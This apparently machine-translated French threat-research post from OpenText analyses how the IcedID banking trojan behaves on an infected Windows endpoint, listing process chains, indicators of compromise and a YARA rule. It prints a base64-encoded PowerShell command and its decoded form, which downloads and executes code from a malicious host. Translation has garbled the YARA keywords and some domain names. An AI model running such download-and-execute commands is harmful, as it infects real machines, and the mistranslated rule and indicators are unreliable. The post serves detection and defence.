Disséquer le comportement d’IcedID sur un endpoint infecté

IcedID, également connu sous le nom de BokDot, est un cheval de Troie bancaire qui a été découvert pour la première fois en 2017. Il cible les informations financières d’une victime et est également capable de déposer d’autres logiciels malveillants, le plus souvent CobaltStrike.

OpenText ™ Cybersecurity Services a observé une récente campagne de spam où IcedID a été livré via un fichier zip archivé contenant un script Visual Basic.

L’équipe OpenText Services, dans le cadre de ses activités de recherche sur les menaces, surveille en permanence le comportement des logiciels malveillants sur le terminal et crée un contenu d’alerte pour le Service de détection et de réponse étendues gérées OpenText (MxDR) et ses clients des services de sécurité gérés.

Chaîne d’infection

Lors de l’exécution d’un JavaScript malveillant associé à l’infection IcedID, il appelle l’interpréteur de commandes pour exécuter un Windows PowerShell encodé en base64. Le PowerShell communique ensuite vers un domaine de redirection IcedID, suivi d’un téléchargement d’un malveillant DLL déposer. Ensuite, le PowerShell exécute la DLL téléchargée à l’aide du processus Rundll. Et enfin, la DLL lance un client Command and Control (C2) qui génère du trafic avec le serveur IcedID C2.

Processus parent : C:\Windows\explorer.exe
Processus enfant : C:\Windows\System32\wscript.exe
Ligne de commande: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js

Processus parent : C:\Windows\System32\wscript.exe
Processus enfant : C:\Windows\System32\cmd.exe
Ligne de commande: “C:\Windows\System32\cmd.exe” /c poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Script Base64 décodé :
IEX (New-Object Net.Webclient).downloadstring(« http://shisyatnic[.]haut/gatef1.php »)

Processus parent : C:\Windows\System32\cmd.exe
Processus enfant : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Ligne de commande: poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Règle Yara pour l’identification IcedID :

règle IcedID_Malware {
méta :
auteur = « OpenText »
description = « Détecte IcedID »
chaînes :
$s1 = « POST » mot complet large
$s2 =  » ; _ga= » mot complet large
$s3 =  » ; _u= » mot complet large
$s4 =  » ; __io= » mot complet large
$s5 =  » ; _gid= » mot complet large
$s6 = « Cookie : _s= » mot entier large
condition:
tout ($s*)
}

Indicateurs de compromis :
Domaine de redirection IcedID : chisyatnik[.]haut/gatef1.php
Domaine d’hébergement DLL IcedID : shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2 : skanfordiporka[.]com
IcedID JavaScript : hachage MD5 – fb1a30af0da989004eaeeac8e72778df
DLL IcedID : hachage MD5 – 658f14c5d83de5e5fee5f5ae00087139

Services de cybersécurité OpenText

Lors de la détection d’un logiciel malveillant, comme IceID, OpenText recommande qu’une réponse aux incidents soit effectuée. Notre équipe de consultants utilise sa vaste expérience pour chasser les menaces et remédier à toute cyberattaque suspectée. Les clients comptent sur OpenText pour leur criminalistique numérique et leur réponse aux incidents, ainsi que pour nos services de conseil en matière de risques et de conformité et de sécurité gérée. En savoir plus sur nos Services.